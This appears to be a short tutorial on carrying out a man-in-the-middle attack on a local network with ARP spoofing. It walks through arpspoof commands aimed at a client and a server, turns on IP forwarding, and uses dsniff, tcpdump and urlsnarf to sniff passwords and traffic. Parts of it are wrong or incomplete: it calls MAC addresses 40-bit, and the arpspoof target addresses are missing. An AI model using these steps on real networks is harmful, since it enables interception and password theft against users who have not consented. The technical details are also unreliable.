Man in the middle attack using arpspoofing (MITM Attack).
MITM (Man IN The Middle Attack/MITA):-
when attackers place themselves between client and server. and thereby have access to all the traffic between the client and the server.
Arp spoof:-
when an attacker wants to place themselves between the client and the server they will need to spoof the arp of two systems. there are several other methods to perform a MITM attack. but this one is most commonly used in Lan networks
In a MITM attack attacker has to convince the server that he is the client. and convince the client that he is the server.
The risks of MITM attack.
1:sniffing passwords
2:finding secret information
3:alter commincation
ARP stands for Address Resolution Protocol and it translated b/w 40-bit physical mac address and 32-bit logical
The IP address enables network switches and other network devices to identify which nic card has which IP address.
first step: for the arp spoof to tell the client that you are the server
check how many clients in the Lan network
command: in Linux terminal
Address HWtype HWaddress Flags Mask Iface ether 9e:ec:27:bb:c2:34 C wlan0 //server ip ether 02:02:f7:b7:67:55 C wlan0 // client 1 our target ether 7c:6b:9c:28:01:65 C wlan0 // client 2
now type command to tell the client you are the server //my IP is (Linux machine)
>arpspoof -i wlan0 -t // -i is interface. In my case its wlan0
open a new terminal tell server that you are the client (
>arpspoof -i wlan0 -t
Second step: we have to forward the IP address
>echo 1 > /proc/sys/net/ipv4/ip_forward
//echo 1 tells the kernel to place a 1 (1=enable, 0 = disable) in the ip_forward field in the proc directory
third step: listen on wlan0 by dsniff
>dsniff -i wlan0 // wlan0 in my case
open a new terminal to monitor traffic and type.
>tcpdump -i wlan0
final step: now you are good to go for MITM Attack. type command in cmd
>urlsnarf -i wlan0
Congratulations you have to learn the MITM Attack using arp spoofing.
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